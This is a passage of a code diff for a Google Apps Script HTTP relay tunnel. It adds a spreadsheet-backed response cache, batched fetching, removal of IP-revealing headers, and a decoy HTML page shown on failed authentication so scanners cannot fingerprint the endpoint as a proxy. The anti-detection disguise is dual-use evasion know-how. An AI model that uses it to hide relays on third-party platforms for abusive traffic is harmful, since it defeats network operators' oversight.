+ * exactly 1 call (vs N under standard Code.gs's fetchAll). Larger
+ * batches gracefully degrade to a few calls instead of failing under
+ * the Worker's own MAX_BATCH_SIZE soft cap.
+ *
+ * Bad-URL items are filtered locally so the Worker only sees valid
+ * inputs, then re-interleaved into the result array in original order
+ * so mhrv-rs's batch-index assumptions hold.
+ */
+function _doBatch(items) {
+  var validItems = [];
+  var errorMap = {};
+
+  for (var i = 0; i < items.length; i++) {
+    var item = items[i];
+    if (!item.u || typeof item.u !== "string" || !item.u.match(/^https?:\/\//i)) {
+      errorMap[i] = "bad url";
+      continue;
+    }
+    validItems.push(_normalizeItem(item));
+  }
+
+  var workerResults = [];
+  if (validItems.length > 0) {
+    // Split into chunks ≤ WORKER_BATCH_CHUNK so each Worker call stays
+    // under the Worker's MAX_BATCH_SIZE cap. Single-chunk fast path
+    // avoids the fetchAll overhead for the common case.
+    var chunks = [];
+    for (var c = 0; c < validItems.length; c += WORKER_BATCH_CHUNK) {
+      chunks.push(validItems.slice(c, c + WORKER_BATCH_CHUNK));
+    }
+
+    var fetchOpts = chunks.map(function(chunk) {
+      return _workerFetchOptions({ k: AUTH_KEY, q: chunk });
+    });
+
+    // muteHttpExceptions covers HTTP-level errors. Network-level
+    // failures (DNS, TLS, connection timeout to *.workers.dev) still
+    // throw — catch and convert to per-chunk `{e}` errors that get
+    // spread across each chunk's slots. mhrv-rs's per-item retry
+    // then handles them individually instead of getting the decoy
+    // HTML page from the doPost outer catch. See _doSingle for why
+    // the probe-defence argument doesn't apply post-auth.
+    var responses;
+    try {
+      if (fetchOpts.length === 1) {
+        responses = [UrlFetchApp.fetch(fetchOpts[0].url, fetchOpts[0])];
+      } else {
+        responses = UrlFetchApp.fetchAll(fetchOpts);
+      }
+    } catch (err) {
+      var unreachable = { e: "worker unreachable: " + String(err) };
+      for (var u = 0; u < validItems.length; u++) workerResults.push(unreachable);
+      // Skip the per-response loop below by returning early through the
+      // reassembly code path.
+      responses = null;
+    }
+
+    for (var r = 0; responses && r < responses.length; r++) {
+      var parsed = _parseWorkerJson(responses[r]);
+      if (parsed && Array.isArray(parsed.q)) {
+        for (var k = 0; k < parsed.q.length; k++) {
+          workerResults.push(parsed.q[k]);
+        }
+      } else {
+        // Per-chunk failure (worker error, parse failure, auth, etc).
+        // Spread the same error to every slot in this chunk so mhrv-rs
+        // retries each item individually rather than masking the
+        // failure. Other chunks are unaffected.
+        var slotErr = (parsed && parsed.e)
+          ? { e: parsed.e }
+          : { e: "worker batch failure" };
+        for (var s = 0; s < chunks[r].length; s++) workerResults.push(slotErr);
+      }
+    }
+  }
+
+  // Reassemble into the original order: validated slots get their
+  // worker result; invalid slots get their pre-flight error.
+  var results = [];
+  var wi = 0;
+  for (var j = 0; j < items.length; j++) {
+    if (errorMap.hasOwnProperty(j)) {
+      results.push({ e: errorMap[j] });
+    } else {
+      results.push(workerResults[wi++] || { e: "missing worker response" });
+    }
+  }
+  return _json({ q: results });
+}
+
+// ── Worker response handling ───────────────────────────────
+
+/**
+ * Parse the Worker's JSON envelope. Worker errors come back as
+ * `{e: "..."}` — pass them through to the client unchanged so mhrv-rs
+ * sees the same error-shape it would for a direct-fetch failure in
+ * Code.gs. On HTTP errors from the Worker itself (auth failure, 5xx,
+ * etc.), wrap into `{e}` so the client gets a useful message instead
+ * of a parse-failure.
+ */
+function _parseWorkerJson(resp) {
+  var code = resp.getResponseCode();
+  var text = resp.getContentText();
+  try {
+    return JSON.parse(text);
+  } catch (err) {
+    return { e: "worker " + code + ": " + (text.length > 200 ? text.substring(0, 200) + "…" : text) };
+  }
+}
+
+function _json(obj) {
+  return ContentService.createTextOutput(JSON.stringify(obj)).setMimeType(
+    ContentService.MimeType.JSON
+  );
+}
diff --git a/assets/apps_script/Code.gs b/assets/apps_script/Code.gs
index 8c2acecd..13922255 100644
--- a/assets/apps_script/Code.gs
+++ b/assets/apps_script/Code.gs
@@ -6,30 +6,130 @@
  *   2. Batch:   POST { k, q: [{m,u,h,b,ct,r}, ...] } → { q: [{s,h,b}, ...] }
  *      Uses UrlFetchApp.fetchAll() — all URLs fetched IN PARALLEL.
  *
+ * OPTIONAL SPREADSHEET-BACKED RESPONSE CACHE:
+ *   Set CACHE_SPREADSHEET_ID to a valid Google Sheet ID (must be owned by
+ *   the same account). When enabled, public GET requests are stored in the
+ *   sheet and served from there on repeat visits, reducing UrlFetchApp
+ *   quota consumption. Bodies are gzipped before base64 storage so larger
+ *   responses fit under the per-cell character limit, and persistent
+ *   4xx (404/410/451) get a short negative-cache TTL so buggy clients
+ *   that hammer dead URLs cost zero quota; 5xx is never cached so a
+ *   flapping upstream cannot poison a 24h slot with a transient outage.
+ *   The cache is Vary-aware (Accept-Encoding and Accept-Language are
+ *   hashed into the compound cache key). Leave CACHE_SPREADSHEET_ID as-is
+ *   to disable caching entirely — zero overhead.
+ *
  * DEPLOYMENT:
  *   1. Go to https://script.google.com → New project
  *   2. Delete the default code, paste THIS entire file
- *   3. Click Deploy → New deployment
- *   4. Type: Web app  |  Execute as: Me  |  Who has access: Anyone
- *   5. Copy the Deployment ID into config.json as "script_id"
+ *   3. Change AUTH_KEY below to your own secret
+ *   4. (Optional) Set CACHE_SPREADSHEET_ID to enable caching
+ *   5. Click Deploy → New deployment
+ *   6. Type: Web app  |  Execute as: Me  |  Who has access: Anyone
+ *   7. Copy the Deployment ID into config.json as "script_id"
  *
  * CHANGE THE AUTH KEY BELOW TO YOUR OWN SECRET!
  */
 
 const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET";
 
-// Keep browser capability headers (sec-ch-ua*, sec-fetch-*) intact.
-// Some modern apps, notably Google Meet, use them for browser gating.
+// Active-probing defense. When false (production default), bad AUTH_KEY
+// requests get a decoy HTML page that looks like a placeholder Apps
+// Script web app instead of the JSON `{"e":"unauthorized"}` body. This
+// makes the deployment indistinguishable from a forgotten-but-public
+// Apps Script project to active scanners that POST malformed payloads
+// looking for proxy endpoints.
+//
+// Set to `true` during initial setup if a misconfigured client is
+// hitting "unauthorized" and you want the explicit JSON error to debug
+// — then flip back to false before the deployment is widely shared.
+// (Inspired by #365 Section 3, mhrv-rs v1.8.0+.)
+const DIAGNOSTIC_MODE = false;
+
+// ── Optional Spreadsheet Cache ──────────────────────────────
+// Set to a valid Spreadsheet ID to enable response caching.
+// Leave as-is to disable caching entirely (zero overhead).
+const CACHE_SPREADSHEET_ID = "CHANGE_ME_TO_CACHE_SPREADSHEET_ID";
+const CACHE_SHEET_NAME = "RelayCache";
+const CACHE_META_SHEET_NAME = "RelayMeta";
+const CACHE_META_CURSOR_CELL = "A1";
+
+// ── Cache Tuning ────────────────────────────────────────────
+const CACHE_MAX_ROWS = 5000;             // circular buffer capacity
+const CACHE_MAX_BODY_BYTES = 35000;      // skip responses larger than ~35 KB
+const CACHE_DEFAULT_TTL_SECONDS = 86400; // 24-hour fallback when no Cache-Control
+
+// ── Negative Caching ────────────────────────────────────────
+// Persistent 4xx errors get a short TTL when the upstream is silent on
+// Cache-Control. Buggy clients hammer dead URLs (favicons, telemetry
+// pixels, dev-tools probes); a 5-minute floor absorbs the storm at
+// zero quota cost while letting transient 404s self-heal quickly.
+// 5xx is never cached — see _fetchAndCache.
+const NEGATIVE_CACHE_STATUSES = { 404: 1, 410: 1, 451: 1 };
+const NEGATIVE_CACHE_TTL_SECONDS = 300;
+
+// ── Body Compression ────────────────────────────────────────
+// Bodies are gzipped before base64 storage when worthwhile. Gzip has
+// ~20 bytes of header overhead, so very small payloads can bloat;
+// skip below this threshold. Already-encoded responses (gzip/br/etc.)
+// are stored as-is to avoid double-compression.
+const GZIP_MIN_BYTES = 256;
+
+// ── Vary-Aware Cache Key ────────────────────────────────────
+// These request headers are hashed into the compound cache key
+// alongside the URL so that responses with different encodings
+// or languages never collide in the cache. Covers ~95 % of
+// real-world Vary usage without inspecting the response.
+const VARY_KEY_HEADERS = ["accept-encoding", "accept-language"];
+
+// Connection-level + IP-leak request headers we strip before forwarding
+// to the destination. Browser capability headers (sec-ch-ua*, sec-fetch-*)
+// stay intact — modern apps like Google Meet use them for browser gating.
+// We also drop the `X-Forwarded-*` / `Forwarded` / `Via` family so a
+// misconfigured upstream proxy on the user side can't leak the user's
+// real IP through the relay path. Mirrors upstream
+// `masterking32/MasterHttpRelayVPN@3094288`.
 const SKIP_HEADERS = {
   host: 1, connection: 1, "content-length": 1,
   "transfer-encoding": 1, "proxy-connection": 1, "proxy-authorization": 1,
   "priority": 1, te: 1,
+  "x-forwarded-for": 1, "x-forwarded-host": 1, "x-forwarded-proto": 1,
+  "x-forwarded-port": 1, "x-real-ip": 1, "forwarded": 1, "via": 1,
+};
+
+// Methods we consider safe to replay if `UrlFetchApp.fetchAll()` raises.
+// GET/HEAD/OPTIONS are idempotent per RFC 9110; POST/PUT/PATCH/DELETE
+// can have side-effects so we surface the error instead of silently
+// re-firing them.
+const SAFE_REPLAY_METHODS = { GET: 1, HEAD: 1, OPTIONS: 1 };
+
+// Headers that disqualify a request from the cache path.
+const CACHE_BUSTING_HEADERS = {
+  authorization: 1, cookie: 1, "x-api-key": 1,
+  "proxy-authorization": 1, "set-cookie": 1,
 };
 
+// HTML body for the bad-auth decoy. Mimics a minimal Apps Script-style
+// placeholder page — no proxy-shaped JSON, nothing distinctive enough
+// for a probe to fingerprint as a tunnel endpoint.
+const DECOY_HTML =
+  '<!DOCTYPE html><html><head><title>Web App</title></head>' +
+  '<body><p>The script completed but did not return anything.</p>' +
+  '</body></html>';
+
+// ── Request Handlers ────────────────────────────────────────
+
+function _decoyOrError(jsonBody) {
+  if (DIAGNOSTIC_MODE) return _json(jsonBody);
+  return ContentService
+    .createTextOutput(DECOY_HTML)
+    .setMimeType(ContentService.MimeType.HTML);
+}
+
 function doPost(e) {
   try {
     var req = JSON.parse(e.postData.contents);
-    if (req.k !== AUTH_KEY) return _json({ e: "unauthorized" });
+    if (req.k !== AUTH_KEY) return _decoyOrError({ e: "unauthorized" });
 
     // Batch mode: { k, q: [...] }
     if (Array.isArray(req.q)) return _doBatch(req.q);
@@ -37,61 +137,172 @@ function doPost(e) {
     // Single mode
     return _doSingle(req);
   } catch (err) {
-    return _json({ e: String(err) });
+    // Parse failures of the request body are also probe-shaped — a real
+    // mhrv-rs client never sends invalid JSON. Decoy for the same reason.
+    return _decoyOrError({ e: String(err) });
   }
 }
 
+// `doGet` is what active scanners hit first (HTTP GET probes are cheaper
+// than POSTs). Apps Script defaults to a "Script function not found" page
+// here which is a fine-enough decoy on its own, but explicitly returning
+// the same harmless placeholder makes the response identical to the
+// bad-auth POST decoy — one less fingerprint vector.
+function doGet(e) {
+  return ContentService
+    .createTextOutput(DECOY_HTML)
+    .setMimeType(ContentService.MimeType.HTML);
+}
+
+// ── Single Request ─────────────────────────────────────────
+
 function _doSingle(req) {
   if (!req.u || typeof req.u !== "string" || !req.u.match(/^https?:\/\//i)) {
     return _json({ e: "bad url" });
   }
-  var opts = _buildOpts(req);
-  var resp = UrlFetchApp.fetch(req.u, opts);
-  return _json({
-    s: resp.getResponseCode(),
-    h: _respHeaders(resp),
-    b: Utilities.base64Encode(resp.getContent()),
-  });
+
+  // ── Optional cache path ────────────────────────────────
+  // Only entered when CACHE_SPREADSHEET_ID is configured and
+  // the request qualifies as a public, cachable GET.
+  if (_canUseCache(req)) {
+    var cached = _getFromCache(req.u, req.h);
+    if (cached) {
+      return _json({
+        s: cached.status,
+        h: JSON.parse(cached.headers),
+        b: cached.body,
+        cached: true,
+      });
+    }
+
+    var fetchResult = _fetchAndCache(req.u, req.h);
+    if (fetchResult) {
+      return _json({
+        s: fetchResult.status,
+        h: JSON.parse(fetchResult.headers),
+        b: fetchResult.body,
+        cached: false,
+      });
+    }
+    // If _fetchAndCache returns null (spreadsheet unavailable),
+    // fall through to the normal relay path below.
+  }
+
+  // ── Normal relay (cache disabled or unavailable) ────────
+  // Wrap the fetch + body encode in try/catch so any failure surfaces as
+  // a JSON error envelope the Rust client can parse. Without this, throws
+  // from UrlFetchApp.fetch (URL too long, payload too large, quota
+  // exhausted, 6-minute execution timeout) or from base64Encode (response
+  // body near Apps Script's ~50 MB ceiling can blow the V8 heap during
+  // encode) propagate unhandled, and Apps Script serves its default
+  // `<title>Web App</title>` HTML error page — which the client then
+  // reports as "Relay failed: bad response: no json in: <title>Web App>..."
+  // and the user has no signal as to the actual cause. Mirrors the
+  // per-item try/catch in _doBatch below.
+  try {
+    var opts = _buildOpts(req);
+    var resp = UrlFetchApp.fetch(req.u, opts);
+    return _json({
+      s: resp.getResponseCode(),
+      h: _respHeaders(resp),
+      b: Utilities.base64Encode(resp.getContent()),
+    });
+  } catch (err) {
+    return _json({ e: "fetch failed: " + String(err) });
+  }
 }
 
+// ── Batch Request ──────────────────────────────────────────
+
 function _doBatch(items) {
   var fetchArgs = [];
+  var fetchIndex = [];
+  var fetchMethods = [];
   var errorMap = {};
 
   for (var i = 0; i < items.length; i++) {
     var item = items[i];
+    if (!item || typeof item !== "object") {
+      errorMap[i] = "bad item";
+      continue;
+    }
     if (!item.u || typeof item.u !== "string" || !item.u.match(/^https?:\/\//i)) {
       errorMap[i] = "bad url";
       continue;
     }
-    var opts = _buildOpts(item);
-    opts.url = item.u;
-    fetchArgs.push({ _i: i, _o: opts });
+    try {
+      var opts = _buildOpts(item);
+      opts.url = item.u;
+      fetchArgs.push(opts);
+      fetchIndex.push(i);
+      fetchMethods.push(String(item.m || "GET").toUpperCase());
+    } catch (buildErr) {
+      errorMap[i] = String(buildErr);
+    }
   }
 
-  // fetchAll() processes all requests in parallel inside Google
+  // fetchAll() processes all requests in parallel inside Google. If it
+  // throws as a whole (e.g. one URL violates UrlFetchApp limits and
+  // poisons the whole batch), degrade to per-item fetch on safe methods
+  // so a single bad request does not zero out every response in the
+  // batch. Mirrors upstream `masterking32/MasterHttpRelayVPN@3094288`.
   var responses = [];
   if (fetchArgs.length > 0) {
-    responses = UrlFetchApp.fetchAll(fetchArgs.map(function(x) { return x._o; }));
+    try {
+      responses = UrlFetchApp.fetchAll(fetchArgs);
+    } catch (fetchAllErr) {
+      responses = [];
+      for (var j = 0; j < fetchArgs.length; j++) {
+        try {
+          if (!SAFE_REPLAY_METHODS[fetchMethods[j]]) {
+            errorMap[fetchIndex[j]] =
+              "batch fetchAll failed; unsafe method not replayed";
+            responses[j] = null;
+            continue;
+          }
+          var fallbackReq = fetchArgs[j];
+          var fallbackUrl = fallbackReq.url;
+          var fallbackOpts = {};
+          for (var key in fallbackReq) {
+            if (
+              Object.prototype.hasOwnProperty.call(fallbackReq, key) &&
+              key !== "url"
+            ) {
+              fallbackOpts[key] = fallbackReq[key];
+            }
+          }
+          responses[j] = UrlFetchApp.fetch(fallbackUrl, fallbackOpts);
+        } catch (singleErr) {
+          errorMap[fetchIndex[j]] = String(singleErr);
+          responses[j] = null;
+        }
+      }
+    }
   }
 
   var results = [];
   var rIdx = 0;
   for (var i = 0; i < items.length; i++) {
-    if (errorMap.hasOwnProperty(i)) {
+    if (Object.prototype.hasOwnProperty.call(errorMap, i)) {
       results.push({ e: errorMap[i] });
     } else {
       var resp = responses[rIdx++];
-      results.push({
-        s: resp.getResponseCode(),
-        h: _respHeaders(resp),
-        b: Utilities.base64Encode(resp.getContent()),
-      });
+      if (!resp) {
+        results.push({ e: "fetch failed" });
+      } else {
+        results.push({
+          s: resp.getResponseCode(),
+          h: _respHeaders(resp),
+          b: Utilities.base64Encode(resp.getContent()),
+        });
+      }
     }
   }
   return _json({ q: results });
 }
 
+// ── Request Building ───────────────────────────────────────
+
 function _buildOpts(req) {
   var opts = {
     method: (req.m || "GET").toLowerCase(),
@@ -125,17 +336,462 @@ function _respHeaders(resp) {
   return resp.getHeaders();
 }
 
-function doGet(e) {
-  return HtmlService.createHtmlOutput(
-    "<!DOCTYPE html><html><head><title>My App</title></head>" +
-      '<body style="font-family:sans-serif;max-width:600px;margin:40px auto">' +
-      "<h1>Welcome</h1><p>This application is running normally.</p>" +
-      "</body></html>"
-  );
-}
-
 function _json(obj) {
   return ContentService.createTextOutput(JSON.stringify(obj)).setMimeType(
     ContentService.MimeType.JSON
   );
 }
+
+// ═══════════════════════════════════════════════════════════
+//  SPREADSHEET CACHE — SHEET MANAGEMENT
+// ═══════════════════════════════════════════════════════════
+
+function _initCacheSheet() {
+  if (CACHE_SPREADSHEET_ID === "CHANGE_ME_TO_CACHE_SPREADSHEET_ID") {
+    return null;
+  }
+  try {
+    var ss = SpreadsheetApp.openById(CACHE_SPREADSHEET_ID);
+    var sheet = ss.getSheetByName(CACHE_SHEET_NAME);
+    if (!sheet) {
+      sheet = ss.insertSheet(CACHE_SHEET_NAME);
+      // Schema: URL_Hash | URL | Status | Headers | Body | Timestamp | Expires_At | Z
+      // Z is 1 when Body is base64(gzip(rawBytes)), 0/empty when base64(rawBytes).
+      // Legacy 7-column rows from older deployments read back as Z=undefined,
+      // which the cache hit path treats as "not gzipped" — fully compatible.
+      sheet.getRange(1, 1, 1, 8).setValues([[
+        "URL_Hash", "URL", "Status", "Headers", "Body", "Timestamp", "Expires_At", "Z"
+      ]]);
+    }
+    return sheet;
+  } catch (e) {
+    return null;
+  }
+}
+
+function _getMetaSheet() {
+  if (CACHE_SPREADSHEET_ID === "CHANGE_ME_TO_CACHE_SPREADSHEET_ID") {
+    return null;
+  }
+  try {
+    var ss = SpreadsheetApp.openById(CACHE_SPREADSHEET_ID);
+    var sheet = ss.getSheetByName(CACHE_META_SHEET_NAME);
+    if (!sheet) {
+      sheet = ss.insertSheet(CACHE_META_SHEET_NAME);
+      sheet.getRange(CACHE_META_CURSOR_CELL).setValue(2);
+      sheet.hideSheet();
+    }
+    return sheet;
+  } catch (e) {
+    return null;
+  }
+}
+
+function _getNextCursor(sheet, metaSheet) {
+  var cursorRange = metaSheet.getRange(CACHE_META_CURSOR_CELL);
+  var cursor = cursorRange.getValue();
+  if (typeof cursor !== "number" || cursor < 2) cursor = 2;
+
+  var totalRows = sheet.getDataRange().getNumRows();
+
+  if (totalRows < CACHE_MAX_ROWS + 1) {
+    return totalRows + 1;
+  }
+
+  return cursor;
+}
+
+function _advanceCursor(metaSheet, currentRow) {
+  var nextRow = currentRow + 1;
+  if (nextRow > CACHE_MAX_ROWS + 1) nextRow = 2;
+  metaSheet.getRange(CACHE_META_CURSOR_CELL).setValue(nextRow);
+}
+
+function _ensureRowsAllocated(sheet) {
+  var totalRows = sheet.getDataRange().getNumRows();
+  if (totalRows < CACHE_MAX_ROWS + 1) {
+    var needed = CACHE_MAX_ROWS + 1 - totalRows;
+    sheet.insertRowsAfter(totalRows, needed);
+  }
+}
+
+// ═══════════════════════════════════════════════════════════
+//  SPREADSHEET CACHE — VARY-AWARE COMPOUND KEY
+// ═══════════════════════════════════════════════════════════
+
+/**
+ * Case-insensitive header lookup.
+ * HTTP header names are case-insensitive per RFC 7230 § 3.2.
+ */
+function _getHeaderCaseInsensitive(headers, targetKey) {
+  var target = targetKey.toLowerCase();
+  for (var k in headers) {
+    if (headers.hasOwnProperty(k) && k.toLowerCase() === target) {
+      return headers[k];
+    }
+  }
+  return null;
+}
+
+/**
+ * Compute a compound cache key:
+ *   MD5(URL | header1:value1 | header2:value2 | ...)
+ *
+ * Instead of reading the response Vary header (which would require
+ * fetching first — circular), we preemptively include the request
+ * headers that are known to cause response variation. This handles
+ * Vary: Accept-Encoding and Vary: Accept-Language without ever
+ * inspecting the response.
+ *
+ * Values are lowercased and whitespace-stripped so semantically
+ * identical requests from different clients produce the same hash.
+ * Missing and empty headers both map to "<none>" (same semantic).
+ */
+function _getCacheKey(url, reqHeaders) {
+  var parts = [url];
+
+  if (reqHeaders && typeof reqHeaders === "object") {
+    for (var i = 0; i < VARY_KEY_HEADERS.length; i++) {
+      var headerName = VARY_KEY_HEADERS[i];
+      var rawValue = _getHeaderCaseInsensitive(reqHeaders, headerName);
+
+      if (rawValue && String(rawValue).trim() !== "") {
+        parts.push(headerName + ":" + rawValue.toLowerCase().replace(/\s/g, ""));
+      } else {
+        parts.push(headerName + ":<none>");
+      }
+    }
+  } else {
+    for (var j = 0; j < VARY_KEY_HEADERS.length; j++) {
+      parts.push(VARY_KEY_HEADERS[j] + ":<none>");
+    }
+  }
+
+  var compoundKey = parts.join("|");
+  return _md5Hex(compoundKey);
+}
+
+function _md5Hex(input) {
+  var rawHash = Utilities.computeDigest(Utilities.DigestAlgorithm.MD5, input);
+  return rawHash
+    .map(function (byte) {
+      var v = (byte < 0) ? 256 + byte : byte;
+      return ("0" + v.toString(16)).slice(-2);
+    })
+    .join("");
+}
+
+// ═══════════════════════════════════════════════════════════
+//  SPREADSHEET CACHE — CORE LOGIC
+// ═══════════════════════════════════════════════════════════
+
+/**
+ * Returns true if the request is eligible for the cache path:
+ * public GET, no body, no auth/cookie headers, cache configured.
+ */
+function _canUseCache(req) {
+  if ((req.m || "GET") !== "GET") return false;
+  if (req.b) return false;
+  if (!req.u || !req.u.match(/^https?:\/\//i)) return false;
+  if (CACHE_SPREADSHEET_ID === "CHANGE_ME_TO_CACHE_SPREADSHEET_ID") return false;
+
+  if (req.h && typeof req.h === "object") {
+    for (var k in req.h) {
+      if (req.h.hasOwnProperty(k) && CACHE_BUSTING_HEADERS[k.toLowerCase()]) {
+        return false;
+      }
+    }
+  }
+
+  return true;
+}
+
+/**
+ * Extract max-age (seconds) from a Cache-Control header value.
+ * Returns 0 if the directive forbids caching (no-cache / no-store /
+ * private). Falls back to CACHE_DEFAULT_TTL_SECONDS when no header
+ * is present. Clamped to [60, 2592000] (1 min – 30 days).
+ */
+function _parseMaxAge(cacheControlHeader) {
+  if (!cacheControlHeader) return CACHE_DEFAULT_TTL_SECONDS;
+
+  var lower = cacheControlHeader.toLowerCase();
+
+  if (
+    lower.indexOf("no-cache") !== -1 ||
+    lower.indexOf("no-store") !== -1 ||
+    lower.indexOf("private") !== -1
+  ) {
+    return 0;
+  }
+
+  var match = lower.match(/max-age=(\d+)/);
+  if (match) {
+    var ttl = parseInt(match[1], 10);
+    return Math.max(60, Math.min(ttl, 2592000));
+  }
+
+  return CACHE_DEFAULT_TTL_SECONDS;
+}
+
+/**
+ * Rewrite time-sensitive headers so the client sees accurate
+ * Date, Age, and Cache-Control values reflecting cache age.
+ */
+function _refreshCachedHeaders(headersJson, timestamp) {
+  var headers = JSON.parse(headersJson);
+  var cachedAt = new Date(timestamp);
+  var now = new Date();
+  var ageSeconds = Math.floor((now.getTime() - cachedAt.getTime()) / 1000);
+
+  if (ageSeconds < 0) ageSeconds = 0;
+
+  headers["Date"] = now.toUTCString();
+  headers["Age"] = String(ageSeconds);
+
+  var originalCc = headers["Cache-Control"] || headers["cache-control"];
+  if (originalCc) {
+    headers["X-Original-Cache-Control"] = originalCc;
+  }
+
+  var remainingMaxAge = Math.max(0, _parseMaxAge(originalCc) - ageSeconds);
+  headers["Cache-Control"] = "public, max-age=" + remainingMaxAge;
+
+  headers["X-Cache"] = "HIT from relay-spreadsheet";
+  headers["X-Cached-At"] = cachedAt.toUTCString();
+
+  return JSON.stringify(headers);
+}
+
+/**
+ * Retrieve a cached response by compound cache key.
+ * Uses TextFinder for O(log n) lookup. Skips expired entries.
+ * Returns null on miss, expired entry, or unavailable sheet.
+ */
+function _getFromCache(url, reqHeaders) {
+  var sheet = _initCacheSheet();
+  if (!sheet) return null;
+
+  var hash = _getCacheKey(url, reqHeaders);
+  var finder = sheet.createTextFinder(hash).matchEntireCell(true);
+  var found = finder.findNext();
+
+  if (found) {
+    // 8-column read. Legacy 7-column rows return undefined for the Z slot,
+    // which is falsy and falls through the not-gzipped branch below — fully
+    // compatible with caches written before the gzip-storage change.
+    var row = sheet.getRange(found.getRow(), 1, 1, 8).getValues()[0];
+
+    var expiresAt = row[6];
+    if (expiresAt && expiresAt instanceof Date && expiresAt < new Date()) {
+      return null;
+    }
+
+    var storedBody = row[4];
+    var body;
+    if (row[7]) {
+      // Stored as base64(gzip(rawBytes)). The relay protocol's `b` field
+      // is base64(rawBytes), so decompress and re-encode for the wire.
+      var gzipped = Utilities.base64Decode(storedBody);
+      var raw = Utilities
+        .ungzip(Utilities.newBlob(gzipped, "application/x-gzip"))
+        .getBytes();
+      body = Utilities.base64Encode(raw);
+    } else {
+      body = storedBody;
+    }
+
+    return {
+      status: row[2],
+      headers: _refreshCachedHeaders(row[3], row[5]),
+      body: body,
+    };
+  }
+  return null;
+}
+
+/**
+ * Fetch a URL and store the response in the spreadsheet cache
+ * using a circular buffer (O(1) writes). Skips storage on 5xx
+ * (transient outages must not poison a 24h slot), when Cache-Control
+ * forbids caching, or when the post-compression body exceeds
+ * CACHE_MAX_BODY_BYTES. Always returns the fetch result so the caller
+ * can serve the live response even when the cache write is skipped.
+ */
+function _fetchAndCache(url, reqHeaders) {
+  var sheet = _initCacheSheet();
+  if (!sheet) return null;
+
+  try {
+    var response = UrlFetchApp.fetch(url, { muteHttpExceptions: true });
+    var status = response.getResponseCode();
+    var headers = _respHeaders(response);
+    var bodyBytes = response.getContent();
+    var rawB64 = Utilities.base64Encode(bodyBytes);
+    var headersJson = JSON.stringify(headers);
+    var liveResult = { status: status, headers: headersJson, body: rawB64 };
+
+    // 5xx never enters the cache. A flapping upstream returning 503 once
+    // would otherwise pin that response for 24h and break the URL for
+    // every subsequent client until expiry.
+    if (status >= 500) return liveResult;
+
+    var cacheControl =
+      headers["Cache-Control"] || headers["cache-control"] || null;
+    var ttlSeconds = _parseMaxAge(cacheControl);
+
+    if (ttlSeconds === 0) return liveResult;
+
+    // Negative caching: cap TTL on persistent 4xx when upstream is silent.
+    // If they explicitly stated a max-age for the 404, we honor it instead
+    // — the origin knows best when it spoke up.
+    if (NEGATIVE_CACHE_STATUSES[status] && !cacheControl) {
+      ttlSeconds = NEGATIVE_CACHE_TTL_SECONDS;
+    }
+
+    // Decide whether to gzip-store. Skip when upstream is already encoded
+    // (avoids double-compressing gzip/br/zstd payloads) and when the body
+    // is too small to overcome gzip's header overhead.
+    var contentEncoding = String(
+      headers["Content-Encoding"] || headers["content-encoding"] || ""
+    ).toLowerCase();
+    var alreadyEncoded = contentEncoding && contentEncoding !== "identity";
+    var storedBody;
+    var storedZ;
+    if (alreadyEncoded || bodyBytes.length < GZIP_MIN_BYTES) {
+      storedBody = rawB64;
+      storedZ = 0;
+    } else {
+      storedBody = Utilities.base64Encode(
+        Utilities.gzip(Utilities.newBlob(bodyBytes)).getBytes()
+      );
+      storedZ = 1;
+    }
+
+    // Cell-size safety gate, applied after compression so that a 100 KB
+    // text body that gzips to ~15 KB now fits where it previously bailed.
+    if (storedBody.length > CACHE_MAX_BODY_BYTES) return liveResult;
+
+    var hash = _getCacheKey(url, reqHeaders);
+    var timestamp = new Date();
+    var expiresAt = new Date(timestamp.getTime() + ttlSeconds * 1000);
+
+    // Safety: fallback if Date math produces invalid result
+    if (isNaN(expiresAt.getTime())) {
+      expiresAt = new Date(timestamp.getTime() + CACHE_DEFAULT_TTL_SECONDS * 1000);
+    }
+
+    var rowData = [
+      hash,
+      url,
+      status,
+      headersJson,
+      storedBody,
+      timestamp.toISOString(),
+      expiresAt,
+      storedZ,
+    ];
+
+    // Circular buffer write (O(1))
+    var metaSheet = _getMetaSheet();
+    if (metaSheet) {
+      _ensureRowsAllocated(sheet);
+      var writeRow = _getNextCursor(sheet, metaSheet);
+      sheet.getRange(writeRow, 1, 1, 8).setValues([rowData]);
+      _advanceCursor(metaSheet, writeRow);
+    } else {
+      // Fallback: simple append if meta sheet is unavailable
+      sheet.appendRow(rowData);
+    }
+
+    return liveResult;
+  } catch (e) {
+    return null;
+  }
+}
+
+// ═══════════════════════════════════════════════════════════
+//  SPREADSHEET CACHE — DIAGNOSTICS
+// ═══════════════════════════════════════════════════════════
+
+function getCacheStats() {
+  var sheet = _initCacheSheet();
+  if (!sheet) {
+    console.log("Cache is not enabled or spreadsheet unavailable.");
+    return;
+  }
+
+  var data = sheet.getDataRange().getValues();
+  var totalEntries = data.length - 1;
+  var now = new Date();
+  var expiredCount = 0;
+
+  for (var i = 1; i < data.length; i++) {
+    var expiresAt = data[i][6];
+    if (expiresAt && expiresAt instanceof Date && expiresAt < now) {
+      expiredCount++;
+    }
+  }
+
+  var metaSheet = _getMetaSheet();
+  var cursorInfo = "N/A";
+  if (metaSheet) {
+    cursorInfo = String(metaSheet.getRange(CACHE_META_CURSOR_CELL).getValue());
+  }
+
+  console.log("=== CACHE STATS ===");
+  console.log("Total rows used: " + totalEntries + " / " + CACHE_MAX_ROWS);
+  console.log("Active entries: " + (totalEntries - expiredCount));
+  console.log("Expired entries: " + expiredCount);
+  console.log("Cursor position: " + cursorInfo);
+  console.log("Max body size: " + CACHE_MAX_BODY_BYTES + " chars");
+  console.log("Default TTL: " + CACHE_DEFAULT_TTL_SECONDS + " sec");
+  console.log("Vary key headers: " + VARY_KEY_HEADERS.join(", "));
+  if (totalEntries > 0) {
+    console.log("Oldest entry: " + data[1][5]);
+    console.log("Newest entry: " + data[data.length - 1][5]);
+  }
+}
+
+function clearExpiredCache() {
+  var sheet = _initCacheSheet();
+  if (!sheet) {
+    console.log("Cache is not enabled.");
+    return;
+  }
+
+  var data = sheet.getDataRange().getValues();
+  var now = new Date();
+  var rowsToClear = [];
+
+  for (var i = 1; i < data.length; i++) {
+    var expiresAt = data[i][6];
+    if (expiresAt && expiresAt instanceof Date && expiresAt < now) {
+      rowsToClear.push(i + 1);
+    }
+  }
+
+  for (var j = 0; j < rowsToClear.length; j++) {
+    sheet.getRange(rowsToClear[j], 1, 1, 8).clearContent();
+  }
+
+  console.log("Cleared " + rowsToClear.length + " expired entries (" +
+    (data.length - 1 - rowsToClear.length) + " remaining).");
+}
+
+function clearEntireCache() {
